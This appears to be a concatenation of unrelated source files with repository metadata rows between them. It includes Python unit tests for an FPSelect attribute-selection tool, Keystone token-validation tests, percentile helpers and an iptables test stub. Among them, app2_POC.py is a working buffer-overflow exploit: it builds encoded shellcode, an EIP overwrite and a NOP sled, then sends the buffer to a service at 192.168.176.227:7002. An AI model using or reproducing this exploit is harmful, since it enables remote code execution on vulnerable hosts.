def test_parameters(self):
additional_parameters = {
FPSelectParameters.EXPLORED_PATHS: self._explored_paths,
FPSelectParameters.PRUNING: self._pruning}
self.check_parameters(additional_parameters)
def test_run_sensitivity_unreachable(self):
unreachable_sensitivity_threshold = 0.0
unreachable_exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, unreachable_sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.run()
def test_run_asynchronous_sensitivity_unreachable(self):
unreachable_sensitivity_threshold = 0.0
unreachable_exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, unreachable_sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
process = unreachable_exploration.run_asynchronous()
process.join() # Wait for the process to end
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.get_solution()
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.get_satisfying_attribute_sets()
# with self.assertRaises(SensitivityThresholdUnreachable):
# unreachable_exploration.get_explored_attribute_sets()
with self.assertRaises(SensitivityThresholdUnreachable):
unreachable_exploration.get_execution_time()
def test_run(self):
# Run the exploration
self._exploration.run()
# Load the comparison file as a json dictionary
tests_module_path = PurePath(path.abspath(__file__)).parents[1]
comparison_trace_path = tests_module_path.joinpath(
self._expected_trace_path)
with open(comparison_trace_path, 'r') as comparison_file:
comparison_dict = json.load(comparison_file)
expected_explored_attribute_sets = comparison_dict[
TraceData.EXPLORATION]
expected_solution = AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]})
expected_satisfying_attribute_sets = {
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]}),
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1], ATTRIBUTES[2]})}
self.check_run(expected_solution, expected_satisfying_attribute_sets,
expected_explored_attribute_sets,
check_exploration=False)
def test_run_asynchronous(self):
# Run the exploration
process = self._exploration.run_asynchronous()
process.join() # Wait for the process to end
# Load the comparison file as a json dictionary
tests_module_path = PurePath(path.abspath(__file__)).parents[1]
comparison_trace_path = tests_module_path.joinpath(
self._expected_trace_path)
with open(comparison_trace_path, 'r') as comparison_file:
comparison_dict = json.load(comparison_file)
expected_explored_attribute_sets = comparison_dict[
TraceData.EXPLORATION]
expected_solution = AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]})
expected_satisfying_attribute_sets = {
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1]}),
AttributeSet({ATTRIBUTES[0], ATTRIBUTES[1], ATTRIBUTES[2]})}
self.check_run(expected_solution, expected_satisfying_attribute_sets,
expected_explored_attribute_sets,
check_exploration=False)
def test_wrong_number_of_explored_paths(self):
with self.assertRaises(AttributeError):
unaccepted_number_of_explored_paths = 0
wrong_number_of_explored_paths = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=unaccepted_number_of_explored_paths,
pruning=self._pruning)
with self.assertRaises(AttributeError):
unaccepted_number_of_explored_paths = -3
wrong_number_of_explored_paths = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=unaccepted_number_of_explored_paths,
pruning=self._pruning)
def test_save_trace(self):
# Run the exploration
self._exploration.run()
self._check_save_trace(check_exploration=False)
def test_save_trace_asynchronous(self):
# Run the exploration
process = self._exploration.run_asynchronous()
process.join() # Wait for the process to end
self._check_save_trace(check_exploration=False)
class TestFPSelectSinglePathPruningOff(TestFPSelectSinglePathPruningOn):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_OFF
self._explored_paths = 1
self._pruning = PRUNING_OFF
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
class TestFPSelectMultipathPruningOn(TestFPSelectSinglePathPruningOn):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_ON
self._explored_paths = MULTI_EXPLR_PATHS
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
class TestFPSelectMultipathPruningOff(TestFPSelectSinglePathPruningOn):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_OFF
self._pruning = PRUNING_OFF
self._explored_paths = MULTI_EXPLR_PATHS
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
# ======= FPSelect with a single process and using the DummyCleanDataset ======
# ========== FPSelect using multiprocessing and the DummyCleanDataset =========
class TestFPSelectSinglePathPruningOnMultiprocessing(TestFPSelectSinglePathPruningOn):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_ON
self._explored_paths = 1
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
class TestFPSelectSinglePathPruningOffMultiprocessing(TestFPSelectSinglePathPruningOnMultiprocessing):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_OFF
self._explored_paths = 1
self._pruning = PRUNING_OFF
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
class TestFPSelectMultipathPruningOnMultiprocessing(TestFPSelectSinglePathPruningOnMultiprocessing):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_ON
self._explored_paths = MULTI_EXPLR_PATHS
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
class TestFPSelectMultipathPruningOffMultiprocessing(TestFPSelectSinglePathPruningOnMultiprocessing):
def setUp(self):
# If we use the modin engine, we ignore the multiprocessing test as it
# is incompatible with modin
if params.get('DataAnalysis', 'engine') == 'modin.pandas':
self.skipTest()
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_OFF
self._pruning = PRUNING_OFF
self._explored_paths = MULTI_EXPLR_PATHS
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'true')
# ========== FPSelect using multiprocessing and the DummyCleanDataset =========
if __name__ == '__main__':
unittest.main()
| 45.375776
| 102
| 0.723701
| 1,457
| 14,611
| 6.865477
| 0.107756
| 0.050685
| 0.037389
| 0.047986
| 0.826352
| 0.820054
| 0.792362
| 0.761572
| 0.73318
| 0.702389
| 0
| 0.002493
| 0.203819
| 14,611
| 321
| 103
| 45.517134
| 0.857388
| 0.09137
| 0
| 0.743902
| 0
| 0
| 0.046587
| 0.015101
| 0
| 0
| 0
| 0
| 0.02439
| 1
| 0.069106
| false
| 0.004065
| 0.073171
| 0
| 0.174797
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba090bda0cafdff1a6f517b96924b5b2f3caffda
| 12,476
|
py
|
Python
|
keystone/test/functional/test_extensions.py
|
admiyo/keystone
|
9452cf04bc8b0a4dc66dc640615d5ace1ca715f2
|
[
"Apache-2.0"
] | null | null | null |
keystone/test/functional/test_extensions.py
|
admiyo/keystone
|
9452cf04bc8b0a4dc66dc640615d5ace1ca715f2
|
[
"Apache-2.0"
] | null | null | null |
keystone/test/functional/test_extensions.py
|
admiyo/keystone
|
9452cf04bc8b0a4dc66dc640615d5ace1ca715f2
|
[
"Apache-2.0"
] | null | null | null |
import unittest2 as unittest
from keystone.test.functional import common
class TestHPIDMTokensExtension(common.FunctionalTestCase):
"""Test HP-IDM token validation extension"""
def setUp(self):
super(TestHPIDMTokensExtension, self).setUp()
password = common.unique_str()
self.user = self.create_user(user_password=password).json['user']
self.user['password'] = password
self.tenant = self.create_tenant().json['tenant']
self.service = self.create_service().json['OS-KSADM:service']
r = self.create_role(service_name=self.service['name'])
self.role = r.json['role']
self.another_service = self.create_service().json['OS-KSADM:service']
self.service_with_no_users = self.create_service().\
json['OS-KSADM:service']
ar = self.create_role(service_name=self.another_service['name'])
self.another_role = ar.json['role']
rnu = self.create_role(service_name=self.service_with_no_users['name'])
self.role_with_no_users = rnu.json['role']
rns = self.create_role()
self.role_with_no_service = rns.json['role']
self.grant_role_to_user(self.user['id'],
self.role['id'], self.tenant['id'])
self.grant_role_to_user(self.user['id'],
self.role_with_no_service['id'],
self.tenant['id'])
self.grant_role_to_user(self.user['id'],
self.another_role['id'], self.tenant['id'])
self.global_role = self.create_role().json['role']
# crete a global role
self.put_user_role(self.user['id'], self.global_role['id'], None)
def get_token_belongsto(self, token_id, tenant_id, service_ids, **kwargs):
"""GET /tokens/{token_id}?belongsTo={tenant_id}
[&HP-IDM-serviceId={service_ids}]"""
serviceId_qs = ""
if service_ids:
serviceId_qs = "&HP-IDM-serviceId=%s" % (service_ids)
return self.admin_request(method='GET',
path='/tokens/%s?belongsTo=%s%s' % (token_id, tenant_id,
serviceId_qs), **kwargs)
def check_token_belongs_to(self, token_id, tenant_id, service_ids,
**kwargs):
"""HEAD /tokens/{token_id}?belongsTo={tenant_id}
[&HP-IDM-serviceId={service_ids}]"""
serviceId_qs = ""
if service_ids:
serviceId_qs = "&HP-IDM-serviceId=%s" % (service_ids)
return self.admin_request(method='HEAD',
path='/tokens/%s?belongsTo=%s%s' % (token_id, tenant_id,
serviceId_qs), **kwargs)
@unittest.skipIf(common.isSsl(),
"Skipping SSL tests")
def test_token_validation_with_serviceId(self):
scoped = self.post_token(as_json={
'auth': {
'passwordCredentials': {
'username': self.user['name'],
'password': self.user['password']},
'tenantName': self.tenant['name']}}).json['access']
self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(scoped['token']['tenant']['name'],
self.tenant['name'])
# And an admin should be able to validate that our new token is scoped
r = self.get_token_belongsto(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=self.service['id'])
access = r.json['access']
self.assertEqual(access['user']['id'], self.user['id'])
self.assertEqual(access['user']['name'], self.user['name'])
self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(access['token']['tenant']['name'],
self.tenant['name'])
# make sure only the service roles are returned
self.assertIsNotNone(access['user'].get('roles'))
self.assertEqual(len(access['user']['roles']), 1)
self.assertEqual(access['user']['roles'][0]['name'],
self.role['name'])
# make sure check token also works
self.check_token_belongs_to(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=self.service['id'],
assert_status=200)
@unittest.skipIf(common.isSsl(),
"Skipping SSL tests")
def test_token_validation_with_all_serviceId(self):
scoped = self.post_token(as_json={
'auth': {
'passwordCredentials': {
'username': self.user['name'],
'password': self.user['password']},
'tenantName': self.tenant['name']}}).json['access']
self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(scoped['token']['tenant']['name'],
self.tenant['name'])
# And an admin should be able to validate that our new token is scoped
service_ids = "%s,%s" % \
(self.service['id'], self.another_service['id'])
r = self.get_token_belongsto(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=service_ids)
access = r.json['access']
self.assertEqual(access['user']['id'], self.user['id'])
self.assertEqual(access['user']['name'], self.user['name'])
self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(access['token']['tenant']['name'],
self.tenant['name'])
# make sure only the service roles are returned
self.assertIsNotNone(access['user'].get('roles'))
self.assertEqual(len(access['user']['roles']), 2)
role_names = map(lambda x: x['name'], access['user']['roles'])
self.assertTrue(self.role['name'] in role_names)
self.assertTrue(self.another_role['name'] in role_names)
@unittest.skipIf(common.isSsl(),
"Skipping SSL tests")
def test_token_validation_with_no_user_service(self):
scoped = self.post_token(as_json={
'auth': {
'passwordCredentials': {
'username': self.user['name'],
'password': self.user['password']},
'tenantName': self.tenant['name']}}).json['access']
self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(scoped['token']['tenant']['name'],
self.tenant['name'])
# And an admin should be able to validate that our new token is scoped
service_ids = "%s,%s,%s" % (self.service['id'],
self.another_service['id'],
self.service_with_no_users['id'])
r = self.get_token_belongsto(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=service_ids)
access = r.json['access']
self.assertEqual(access['user']['id'], self.user['id'])
self.assertEqual(access['user']['name'], self.user['name'])
self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(access['token']['tenant']['name'],
self.tenant['name'])
# make sure only the service roles are returned, excluding the one
# with no users
self.assertIsNotNone(access['user'].get('roles'))
self.assertEqual(len(access['user']['roles']), 2)
role_names = map(lambda x: x['name'], access['user']['roles'])
self.assertTrue(self.role['name'] in role_names)
self.assertTrue(self.another_role['name'] in role_names)
# make sure check token also works
self.check_token_belongs_to(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=service_ids,
assert_status=200)
@unittest.skipIf(common.isSsl(),
"Skipping SSL tests")
def test_token_validation_without_serviceId(self):
scoped = self.post_token(as_json={
'auth': {
'passwordCredentials': {
'username': self.user['name'],
'password': self.user['password']},
'tenantName': self.tenant['name']}}).json['access']
self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(scoped['token']['tenant']['name'],
self.tenant['name'])
# And an admin should be able to validate that our new token is scoped
r = self.get_token_belongsto(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=None)
access = r.json['access']
self.assertEqual(access['user']['id'], self.user['id'])
self.assertEqual(access['user']['name'], self.user['name'])
self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(access['token']['tenant']['name'],
self.tenant['name'])
# make sure all the roles are returned
self.assertIsNotNone(access['user'].get('roles'))
self.assertEqual(len(access['user']['roles']), 4)
role_names = map(lambda x: x['name'], access['user']['roles'])
self.assertTrue(self.role['name'] in role_names)
self.assertTrue(self.another_role['name'] in role_names)
self.assertTrue(self.global_role['name'] in role_names)
self.assertTrue(self.role_with_no_service['name'] in role_names)
@unittest.skipIf(common.isSsl(),
"Skipping SSL tests")
def test_token_validation_with_global_service_id(self):
scoped = self.post_token(as_json={
'auth': {
'passwordCredentials': {
'username': self.user['name'],
'password': self.user['password']},
'tenantName': self.tenant['name']}}).json['access']
self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(scoped['token']['tenant']['name'],
self.tenant['name'])
service_ids = "%s,%s,global" % (self.service['id'],
self.another_service['id'])
r = self.get_token_belongsto(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=service_ids)
access = r.json['access']
self.assertEqual(access['user']['id'], self.user['id'])
self.assertEqual(access['user']['name'], self.user['name'])
self.assertEqual(access['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(access['token']['tenant']['name'],
self.tenant['name'])
# make sure only the service roles are returned
self.assertIsNotNone(access['user'].get('roles'))
self.assertEqual(len(access['user']['roles']), 3)
role_names = map(lambda x: x['name'], access['user']['roles'])
self.assertTrue(self.role['name'] in role_names)
self.assertTrue(self.another_role['name'] in role_names)
self.assertTrue(self.global_role['name'] in role_names)
@unittest.skipIf(common.isSsl(),
"Skipping SSL tests")
def test_token_validation_with_bogus_service_id(self):
scoped = self.post_token(as_json={
'auth': {
'passwordCredentials': {
'username': self.user['name'],
'password': self.user['password']},
'tenantName': self.tenant['name']}}).json['access']
self.assertEqual(scoped['token']['tenant']['id'], self.tenant['id'])
self.assertEqual(scoped['token']['tenant']['name'],
self.tenant['name'])
service_ids = "%s,%s,boguzzz" % (self.service['id'],
self.another_service['id'])
self.get_token_belongsto(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=service_ids,
assert_status=401)
# make sure check token also works
self.check_token_belongs_to(token_id=scoped['token']['id'],
tenant_id=self.tenant['id'], service_ids=service_ids,
assert_status=401)
if __name__ == '__main__':
unittest.main()
| 48.169884
| 79
| 0.570535
| 1,421
| 12,476
| 4.851513
| 0.085855
| 0.051349
| 0.059182
| 0.046707
| 0.885408
| 0.870612
| 0.863214
| 0.847694
| 0.817377
| 0.812446
| 0
| 0.002074
| 0.26579
| 12,476
| 258
| 80
| 48.356589
| 0.750546
| 0.06789
| 0
| 0.724638
| 0
| 0
| 0.139363
| 0.004336
| 0
| 0
| 0
| 0
| 0.280193
| 1
| 0.043478
| false
| 0.072464
| 0.009662
| 0
| 0.067633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ba10ffecdd9bb39f4629b9406cabb09fd5f9e246
| 285
|
py
|
Python
|
vest/aggregations/percentiles.py
|
vcerqueira/vest-python
|
146e1ee50463637c89e32112283cf857e2eb190a
|
[
"MIT"
] | 5
|
2021-04-26T12:55:05.000Z
|
2021-12-23T20:03:57.000Z
|
vest/aggregations/percentiles.py
|
vcerqueira/vest-python
|
146e1ee50463637c89e32112283cf857e2eb190a
|
[
"MIT"
] | null | null | null |
vest/aggregations/percentiles.py
|
vcerqueira/vest-python
|
146e1ee50463637c89e32112283cf857e2eb190a
|
[
"MIT"
] | 3
|
2021-02-12T23:12:22.000Z
|
2021-06-11T14:25:58.000Z
|
import numpy as np
def p05(x: np.ndarray) -> float:
return np.percentile(x, 5)
def p95(x: np.ndarray) -> float:
return np.percentile(x, 95)
def p01(x: np.ndarray) -> float:
return np.percentile(x, 1)
def p99(x: np.ndarray) -> float:
return np.percentile(x, 99)
| 15.833333
| 32
| 0.635088
| 48
| 285
| 3.770833
| 0.375
| 0.066298
| 0.220994
| 0.331492
| 0.751381
| 0.751381
| 0.751381
| 0.751381
| 0
| 0
| 0
| 0.062222
| 0.210526
| 285
| 17
| 33
| 16.764706
| 0.742222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0.444444
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
ba129e76aa6dd4408b4db4e9d0527e56c8b867b0
| 1,958
|
py
|
Python
|
app2_POC.py
|
CallMeLawrence/bof-references
|
50e45ec348994a50e1c4d2147ad7d6c52fbfc081
|
[
"MIT"
] | null | null | null |
app2_POC.py
|
CallMeLawrence/bof-references
|
50e45ec348994a50e1c4d2147ad7d6c52fbfc081
|
[
"MIT"
] | null | null | null |
app2_POC.py
|
CallMeLawrence/bof-references
|
50e45ec348994a50e1c4d2147ad7d6c52fbfc081
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import socket
try:
print "\nSending evil buffer..."
payload = ("\xbe\x12\xe4\x2f\xbb\xd9\xec\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x73\x12\x03\x73\x12\x83\xf9\x18\xcd\x4e\x01\x08\x90"
"\xb1\xf9\xc9\xf5\x38\x1c\xf8\x35\x5e\x55\xab\x85\x14\x3b\x40"
"\x6d\x78\xaf\xd3\x03\x55\xc0\x54\xa9\x83\xef\x65\x82\xf0\x6e"
"\xe6\xd9\x24\x50\xd7\x11\x39\x91\x10\x4f\xb0\xc3\xc9\x1b\x67"
"\xf3\x7e\x51\xb4\x78\xcc\x77\xbc\x9d\x85\x76\xed\x30\x9d\x20"
"\x2d\xb3\x72\x59\x64\xab\x97\x64\x3e\x40\x63\x12\xc1\x80\xbd"
"\xdb\x6e\xed\x71\x2e\x6e\x2a\xb5\xd1\x05\x42\xc5\x6c\x1e\x91"
"\xb7\xaa\xab\x01\x1f\x38\x0b\xed\xa1\xed\xca\x66\xad\x5a\x98"
"\x20\xb2\x5d\x4d\x5b\xce\xd6\x70\x8b\x46\xac\x56\x0f\x02\x76"
"\xf6\x16\xee\xd9\x07\x48\x51\x85\xad\x03\x7c\xd2\xdf\x4e\xe9"
"\x17\xd2\x70\xe9\x3f\x65\x03\xdb\xe0\xdd\x8b\x57\x68\xf8\x4c"
"\x97\x43\xbc\xc2\x66\x6c\xbd\xcb\xac\x38\xed\x63\x04\x41\x66"
"\x73\xa9\x94\x29\x23\x05\x47\x8a\x93\xe5\x37\x62\xf9\xe9\x68"
"\x92\x02\x20\x01\x39\xf9\xa3\xee\x16\x76\xf2\x87\x64\x78\xfb"
"\xec\xe0\x9e\x91\x02\xa5\x09\x0e\xba\xec\xc1\xaf\x43\x3b\xac"
"\xf0\xc8\xc8\x51\xbe\x38\xa4\x41\x57\xc9\xf3\x3b\xfe\xd6\x29"
"\x53\x9c\x45\xb6\xa3\xeb\x75\x61\xf4\xbc\x48\x78\x90\x50\xf2"
"\xd2\x86\xa8\x62\x1c\x02\x77\x57\xa3\x8b\xfa\xe3\x87\x9b\xc2"
"\xec\x83\xcf\x9a\xba\x5d\xb9\x5c\x15\x2c\x13\x37\xca\xe6\xf3"
"\xce\x20\x39\x85\xce\x6c\xcf\x69\x7e\xd9\x96\x96\x4f\x8d\x1e"
"\xef\xad\x2d\xe0\x3a\x76\x5d\xab\x66\xdf\xf6\x72\xf3\x5d\x9b"
"\x84\x2e\xa1\xa2\x06\xda\x5a\x51\x16\xaf\x5f\x1d\x90\x5c\x12"
"\x0e\x75\x62\x81\x2f\x5c")
filler = "A" * 0x830 # 830
eip = "\x83\x0c\x09\x10"
offset = "C" * 4
sled = "\x90" * 16
shellcode = "D" * 1000
inputBuffer = filler + eip + offset + sled + payload
buffer = inputBuffer
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.176.227", 7002))
s.send(buffer)
s.close()
print "\nDone!"
except:
print "\nCould not connect!"
| 37.653846
| 75
| 0.687436
| 416
| 1,958
| 3.230769
| 0.560096
| 0.008929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265351
| 0.068437
| 1,958
| 51
| 76
| 38.392157
| 0.471491
| 0.010215
| 0
| 0
| 0
| 0.560976
| 0.771178
| 0.725207
| 0
| 1
| 0.002583
| 0
| 0
| 0
| null | null | 0
| 0.02439
| null | null | 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8826301136a2a710f4f2da3588f387b56879102
| 72
|
py
|
Python
|
code/dlhp/hexapawn/__init__.py
|
loewenm/hexapawn
|
d5be90b49ec84dd5086f6344c044f9354a3b2f36
|
[
"MIT"
] | null | null | null |
code/dlhp/hexapawn/__init__.py
|
loewenm/hexapawn
|
d5be90b49ec84dd5086f6344c044f9354a3b2f36
|
[
"MIT"
] | null | null | null |
code/dlhp/hexapawn/__init__.py
|
loewenm/hexapawn
|
d5be90b49ec84dd5086f6344c044f9354a3b2f36
|
[
"MIT"
] | null | null | null |
from dlhp.hexapawn.hpboard import *
from dlhp.hexapawn.hptypes import *
| 24
| 35
| 0.805556
| 10
| 72
| 5.8
| 0.6
| 0.275862
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 72
| 2
| 36
| 36
| 0.90625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e8cf59a07fa758682108410e09aa7d3abcf2d68f
| 165
|
py
|
Python
|
python/warehouse/import/L1/L2/L3/L4/L4_1.py
|
pipazi/notebook
|
99fbc45d3e2cd0a93ebef934b7706ac2377130cd
|
[
"MIT"
] | null | null | null |
python/warehouse/import/L1/L2/L3/L4/L4_1.py
|
pipazi/notebook
|
99fbc45d3e2cd0a93ebef934b7706ac2377130cd
|
[
"MIT"
] | null | null | null |
python/warehouse/import/L1/L2/L3/L4/L4_1.py
|
pipazi/notebook
|
99fbc45d3e2cd0a93ebef934b7706ac2377130cd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on 2020/12/21 15:42
@author: pipazi
"""
# from ...L3.L3_1 import L3_1_1
from ..L3_1 import L3_1_1
def L4_1_1():
L3_1_1()
| 11.785714
| 31
| 0.606061
| 34
| 165
| 2.647059
| 0.529412
| 0.166667
| 0.133333
| 0.244444
| 0.288889
| 0.288889
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 0.2
| 165
| 13
| 32
| 12.692308
| 0.454545
| 0.587879
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e8d8ff2c6169603238695af7109f49b6d7d5742c
| 31,617
|
py
|
Python
|
ansible-devel/test/units/modules/test_iptables.py
|
satishcarya/ansible
|
ed091e174c26316f621ac16344a95c99f56bdc43
|
[
"MIT"
] | null | null | null |
ansible-devel/test/units/modules/test_iptables.py
|
satishcarya/ansible
|
ed091e174c26316f621ac16344a95c99f56bdc43
|
[
"MIT"
] | null | null | null |
ansible-devel/test/units/modules/test_iptables.py
|
satishcarya/ansible
|
ed091e174c26316f621ac16344a95c99f56bdc43
|
[
"MIT"
] | null | null | null |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.module_utils import basic
from ansible.modules import iptables
from units.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
def get_bin_path(*args, **kwargs):
return "/sbin/iptables"
def get_iptables_version(iptables_path, module):
return "1.8.2"
class TestIptables(ModuleTestCase):
def setUp(self):
super(TestIptables, self).setUp()
self.mock_get_bin_path = patch.object(basic.AnsibleModule, 'get_bin_path', get_bin_path)
